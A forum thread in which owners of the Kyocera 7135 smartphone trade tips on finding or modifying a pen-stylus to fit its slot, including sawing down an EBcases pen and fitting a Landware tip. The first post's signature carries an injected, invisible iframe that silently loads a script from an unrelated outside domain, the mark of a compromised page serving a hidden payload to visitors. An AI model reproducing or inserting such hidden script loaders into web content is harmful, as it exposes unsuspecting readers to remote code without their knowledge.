+ Reply to Thread

Any pen stylus' fit the 7135?

Has anyone had success with finding a pen-stylus that will work with the 7135?

Thx
    -GadgetPro<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

The i500's stylus is telescoping. It sounds like it also has a bit of a 'spring' to it. Here's to hoping it fits in the 7135. Not to mention hopefully they will sell them as accessories so we don't have to buy the i500 just to get the stylus!

The Palm "Tungsten T" has a small telescoping stylus too, but I'm not sure if it would fit in the 7135. Anyone have one?
    ~'kito
    pdaPhoneHome Moderator

Originally posted by Markito
    The Palm "Tungsten T" has a small telescoping stylus too, but I'm not sure if it would fit in the 7135. Anyone have one?
    I played with a Tungsten T at the Apple Store, I don't think that the stylus will fit, but the next time I go to the store (just got a gift certificate for my birthday) I'll check it out.
    Sorry, but I no longer make 7135 headset adapters.

Modified EBcases stylus for 7135

Since I liked my EBcases 6035 stylus w/pen, I decided to modify it to fit inside my 7035. I simply cut off the top end of the reset pin end with a hacksaw and then carved a groove around that end with the saw to create a grip. Now its easy to pull it out of the phone. Mine's not production level work, mind you, but its so much nicer than the cheap plastic stylus Kyo ships. I hope EBcases comes up with an elegant solution.

http://www.ebcases.com/Detail.bok/d8...otal=18&no=106

With hidden pen and reset pin exposed:

:coolquick Way to go Sethster! Good idea!
    iPhone therefore iAm.

A 7135 and D7A-G in a Civic Hybrid! KB2PMD's Avatar

My stylus adventure

Hi all,
    There are only two things I really miss now that I've given up my Palm m515 for the 7135. I have the Xircom 802.11b sled for the m515, and I was using Landware's floting point stylus (http://www.landware.com/floatingpoint/index.asp). The stylus is great -- the best-feeling stylus I've ever used. Noticing new scratches appearing on my 7135's graffiti area, I decided to take action.

However, Landware hasn't made a stylus for the 7135, and it looks like they don't plan on it. I decided to try to move the tip from the floating point onto one of the plastic styli that came with my 7135. So, I cut the end off of the 7135's stylus and drilled several successive holes into the center of increasing size (the floating point stylus has a thin point above where it screws in, where the foam is that gives it its 'spring' effect). I put the floating point stylus into it, and it seemed to fit tightly -- big mistake! When I put the stylus in, the bottom part fell out. I noticed then that the plastic shell is designed for such a thing in mind -- to the right of the battery, there's an indent where you can get access to the fallen piece of stylus. So, a quick one-two with the soldering iron, and it was all set! I needed to sand it down a little bit, but here it is!

Sorry for the crummy picture, my digital camera is on its way out.
    Mike

P.S. Waiting with baited breath for the combination 802.11/memory Secure Digital cards!
    If you haven't already, please vote on a bluetooth voice AND data adapter for the 7135 (that plugs into the serial port, leaving your expansion card slot free!)

Very nice! Good job!

so far I liked both solutions, The next thing is which manufacturor is actually going to release one specifically made for the the 7135, or better yet, someone with the right tools, can make some extra $$ by maing these modifications and sell them !!!!!

Good work!

Good work guys... I added these to the 7135 FAQ at pdaPhoneHome.
    Mike Collins
    pdaPhoneHome.com, Home of the i330 FAQ

The Kyocera-wireless.com site has a pen/stylus for sale as a 7135 accessory.

Note that Kyo's accessory stylus does NOT fit inside the 7135. It is a pocket pen/stylus.

Originally posted by LeftCoaster
    The Kyocera-wireless.com site has a pen/stylus for sale as a 7135 accessory.
    http://store.kyocera-wireless.com/pr...VF17GE4HGGCK5E

Pen Stylus for Kyocera 7135?

Is there one that fits the 7135? If so, please post a link

I had one with my VisorPrism and I sure do miss it! I've checked around on various threads here and can't find anything. Just wondering if someone out there knows of a source for a stylus that will fit the 7135 and is a pen.

TIA

http://store.kyocera-wireless.com/pr...QJWMW2G80TCPMD

If you scroll the bar, you will see a Stylus/Pen Combo (TXWEB10006B) for $14.99. Act quickly because the regular proce is $19.99.

William
    I got my new 7135 and loving it!!!!!

Almost, but doesn't fit the 7135 slot

Originally posted by William
    http://store.kyocera-wireless.com/pr...QJWMW2G80TCPMD

If you scroll the bar, you will see a Stylus/Pen Combo (TXWEB10006B) for $14.99. Act quickly because the regular proce is $19.99.

William
    I got my new 7135 and loving it!!!!!
    I saw that one, but it doesn't fit the 7135 slot-unfortunately.

I'm looking for a replacement stylus for the 7135 that is both a stylus and pen. Handspring use to make one that fit the Visor line, as well as Chameleon. Although, from what I've seen no one is (yet) making one to fit the 7135.

I never carry an extra pen on me, I always used the Stylus/Pen combo on my VisorPrism. So far, that's the ONLY thing I miss. I'm sure someone is bound to release one the 7135 (or already has)...

Thanks for your response though!

I too miss my nice, solid Visor stylus (I had the one with the screwdriver and reset pin in it). Unfortunately, there don't seem to be any good 7135 replacement ones yet.

This thread has a previous discussion on this topic, including, for the bold, a discussion of some stylus mods of previously owned ones. I bought one of the EBCases ones, and will be trying the shortening process with a Dremel or hacksaw soon. (It's also just a shade thin, although it does stay in, but I think a quick dot of something (superglue, perhaps) will fix that perfectly.)

In the meantime, the more people who ask EBCases and other vendors to make a 7135 replacement, the better!

Sorry to learn that the stylus/pen Kyocera sells does not fit their phone. If anyone finds oen that fits, please let me know.

William

Originally posted by turboCat
    I too miss my nice, solid Visor stylus (I had the one with the screwdriver and reset pin in it). Unfortunately, there don't seem to be any good 7135 replacement ones yet.

This thread http://www.smartphonesource.com/vbul...&threadid=5328 has a previous discussion on this topic, including, for the bold, a discussion of some stylus mods of previously owned ones. I bought one of the EBCases ones, and will be trying the shortening process with a Dremel or hacksaw soon. (It's also just a shade thin, although it does stay in, but I think a quick dot of something (superglue, perhaps) will fix that perfectly.)

In the meantime, the more people who ask EBCases and other vendors to make a 7135 replacement, the better!
    I just did the EBCases pen/stylus mod and it works decently well. Not quite as easy to pull out the pen as the normal stylus, but other than that works quite well. I too was concerned that the pen would fall out too easily, but amazingly, after you cut off the end of the pen, it stays in pretty securely. I just went to the website to order a couple of more pens, but noticed that they don't carry it anymore. Bummer! I wanted to try putting the 7135 stylus end on the pen/stylus for cleaner fit and better grip to pull it out, but don't want to ruin the only pen/stylus that I have. I put in my request at the EBCases website to make a pen/stylus to fit the 7135, hopefully they come out with one soon.

Someone is bound to make one...